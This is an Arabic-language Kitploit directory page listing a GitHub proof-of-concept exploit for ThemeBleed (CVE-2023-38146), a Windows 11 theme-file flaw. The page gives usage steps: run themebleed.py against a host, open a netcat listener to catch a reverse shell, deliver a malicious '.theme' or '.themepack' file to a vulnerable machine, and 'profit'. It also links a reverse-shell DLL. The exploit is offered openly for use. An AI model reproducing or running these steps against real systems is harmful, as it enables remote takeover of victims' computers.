Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38146-Poc — أفضل POC | Kitploit
أدوات/GitHubGitHub/ch0ico/cve-2023-38146-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubch0ico/cve-2023-38146-poc

CVE-2023-38146-Poc

أفضل POC

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لاستغلال ThemeBleed CVE-2023-38146 (سمات Windows 11)

مستوحاة بشكل كبير من https://github.com/gabe-k/themebleed الذي يعمل فقط على ويندوز (السبب الذي دفعني لكتابة هذا).

استخدمت كودًا معدلاً من impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)

أشياء مفيدة: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs

منشور المدونة: https://jnns.de/posts/cve-2023-38146-poc/

كيفية استخدام هذا:

قم بتثبيت المتطلبات وتشغيل التطبيق:

root@kitploit:~
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711

استخدم ملف "evil_theme.theme" أو "evil_theme.themepack" على جهاز ضعيف.

اربح!

ملف DLL مخصص:

ضع ملف DLL مع دالة مصدرة "VerifyThemeVersion" في المجلد "./td/" باسم "Aero.msstyles_vrf_evil.dll". يجب أن تتمكن من العثور على مثال لـ DLL باستخدام جوجل أو استخدم مثالي https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.

root@kitploit:~
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
تنزيل الأداة